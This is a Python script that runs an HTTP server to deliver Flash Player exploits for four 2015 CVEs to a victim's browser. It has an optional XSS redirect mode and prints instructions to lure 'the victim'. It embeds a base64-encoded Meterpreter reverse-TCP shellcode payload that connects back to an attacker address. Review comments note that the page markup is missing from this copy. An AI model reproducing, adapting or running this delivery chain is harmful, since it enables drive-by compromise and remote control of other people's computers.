#!/usr/bin/python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import time
import base64

# Configurations the original author reports as tested:
#   Windows 7 SP1 (x86), Firefox 38.0, Adobe Flash 17.0.0.169 <- https://exploit-db.com/exploits/37368
#   Windows 8.1 (x64), Firefox 38.0, Adobe Flash 17.0.0.169   <- https://exploit-db.com/exploits/37368
#   Windows 8.1 (x64), Firefox 38.0, Adobe Flash 17.0.0.169   <- https://exploit-db.com/exploits/37448
# Every CVE referenced below is a 2015-era Flash Player bug; Flash Player reached
# end of life at the end of 2020, so these only reproduce on unpatched lab images.

# Address and port the built-in HTTP server binds to. The same two values are
# baked into the redirect script below and into the URL printed at start-up.
hostName = "192.168.1.100"
serverPort = 8080

# XSS mode switch.
#   xss = True  -> request 1 returns the redirect script (JavaScript),
#                  request 2 returns the HTML page, request 3 returns the SWF.
#   xss = False -> request 1 returns the HTML page, request 2 returns the SWF.
# xssInject is only echoed to the console at start-up. It is empty in this copy;
# the author's example snippet appears to have been stripped from the page.
xssInject = ''
xss = False

# JavaScript body served for the first request in xss mode: it bounces the
# browser to the /execute route on this same server.
script = 'window.location.replace("http://{}:{}/execute");'.format(hostName, serverPort)

# Base64 of the payload blob the author generated with:
#   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
# NOTE(review): nothing in the visible code reads this value; presumably it was
# consumed by FlashVars markup that is missing from this copy - confirm.
base64Payload = "/OiPAAAAYInlMdJki1Iwi1IMi1IUMf8Pt0omi3IoMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi0gYi1ggAdNQhcl0PDH/SYs0iwHWMcDBzw2sAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpowKgBZGgCABFcieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V"

# exploit-db id -> SWF file on disk. Targets the author lists per entry:
#   https://exploit-db.com/exploits/37368 -> CVE-2015-3090
#     Windows 7 SP1 (32-bit) IE11 and Firefox 38.0.5, Windows 8.1 Firefox 38.0.5,
#     all with Flash 17.0.0.169; Linux Mint "Rebecca" (32-bit) Firefox 33.0 with
#     Flash 11.2.202.457.
#   https://exploit-db.com/exploits/37448 -> CVE-2015-3105
#     Same Windows browsers with Flash 17.0.0.188; Linux Mint "Rebecca" (32-bit)
#     Firefox 33.0 with Flash 11.2.202.460.
#   https://exploit-db.com/exploits/37523 -> CVE-2015-5119
#     Windows XP Chrome 43, Windows 7 SP1 (32-bit) IE11 and Firefox 38.0.5,
#     Windows 8.1 (32-bit) Firefox, all with Flash 18.0.0.194; Linux Mint
#     "Rebecca" (32-bit) Firefox 33.0 with Flash 11.2.202.468.
#   https://exploit-db.com/exploits/37599 -> CVE-2015-5122
#     Windows 7 SP1 (32-bit) IE11 and IE9 with Flash 18.0.0.203, Firefox 38.0.5
#     and Firefox with Flash 18.0.0.194; Windows 8.1 Firefox with Flash
#     18.0.0.203, 18.0.0.160 and 18.0.0.194.
swfFileList = {
    '37368': 'CVE-2015-3090.swf',
    '37448': 'CVE-2015-3105.swf',
    '37523': 'CVE-2015-5119.swf',
    '37599': 'CVE-2015-5122.swf',
}
# The entry chosen below (swfFile) has to match the Flash version on the remote
# system; the server only ever hosts one SWF at a time.
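# The one SWF this server hosts at /msf.swf, keyed by exploit-db id (see swfFileList).
swfFile = swfFileList['37368']

# Markup fragments for the page that is meant to load /msf.swf.
# NOTE(review): in this copy both fragments are a single space, so html is
# whitespace only and never references the SWF - the original markup appears to
# have been stripped from the page. Left as found rather than reconstructed.
flashVarStr = ' '
embedStr = ' '
html = ''' ''' + flashVarStr + ''' ''' + embedStr + ''' '''


class MyServer(BaseHTTPRequestHandler):
    """Request handler exposing exactly three GET routes: /, /execute, /msf.swf.

    Every successful response carries "Cache-Control: no-cache, no-store" and
    "Pragma: no-cache". Any other path is answered with a 404; the original
    fell out of the if/elif chain and closed the connection without a response.
    """

    def _send_ok(self, headers):
        """Write a 200 status line, then *headers* ((name, value) pairs, in order), then the blank line."""
        self.send_response(200)
        for name, value in headers:
            self.send_header(name, value)
        self.end_headers()

    def _serve_landing(self):
        """Route /: the redirect script when xss is set, otherwise the HTML page."""
        if xss:
            content_type, body = "text/javascript", script
        else:
            content_type, body = "text/html", html
        self._send_ok([
            ("Cache-Control", "no-cache, no-store"),
            ("Content-type", content_type),
            ("Pragma", "no-cache"),
        ])
        self.wfile.write(bytes(body, "utf-8"))

    def _serve_execute(self):
        """Route /execute: always the HTML page (second hop in xss mode)."""
        self._send_ok([
            ("Cache-Control", "no-cache, no-store"),
            ("Content-type", "text/html"),
            ("Pragma", "no-cache"),
        ])
        self.wfile.write(bytes(html, "utf-8"))

    def _serve_swf(self):
        """Route /msf.swf: stream the selected SWF file, re-read from disk on each request.

        The file is read *before* any header goes out so that a missing or
        unreadable file can still be reported as a clean 404. The original
        opened it after end_headers() and never closed the handle.
        """
        try:
            with open(swfFile, "rb") as swf_handle:
                data = swf_handle.read()
        except OSError:
            self.send_error(404)
            return
        self._send_ok([
            ("Cache-Control", "no-cache, no-store"),
            ("Connection", "Keep-Alive"),
            ("Content-type", "application/x-shockwave-flash"),
            ("Pragma", "no-cache"),
            # send_response() has already emitted BaseHTTP's default Server
            # header, so this adds a second Server header rather than replacing it.
            ("Server", "Apache"),
        ])
        self.wfile.write(data)

    # Exact-path dispatch table; anything not listed is a 404.
    _ROUTES = {
        "/": _serve_landing,
        "/execute": _serve_execute,
        "/msf.swf": _serve_swf,
    }

    def do_GET(self):
        """Dispatch on the exact request path (no query-string or prefix matching)."""
        handler = self._ROUTES.get(self.path)
        if handler is None:
            self.send_error(404)
            return
        handler(self)


if __name__ == "__main__":
    webServer = HTTPServer((hostName, serverPort), MyServer)
    print("Server started on http://%s:%s and hosting %s" % (hostName, serverPort, swfFile))
    if xss:
        print("Have the victim request a web page that includes the following XSS inject:")
        print(" ", xssInject)
    else:
        print("Have the victim request the following web page:")
        print(" http://%s:%s" % (hostName, serverPort))
    try:
        webServer.serve_forever()
    except KeyboardInterrupt:
        pass
    finally:
        # Release the listening socket even if serve_forever() raised something
        # other than KeyboardInterrupt.
        webServer.server_close()
    print("Server stopped.")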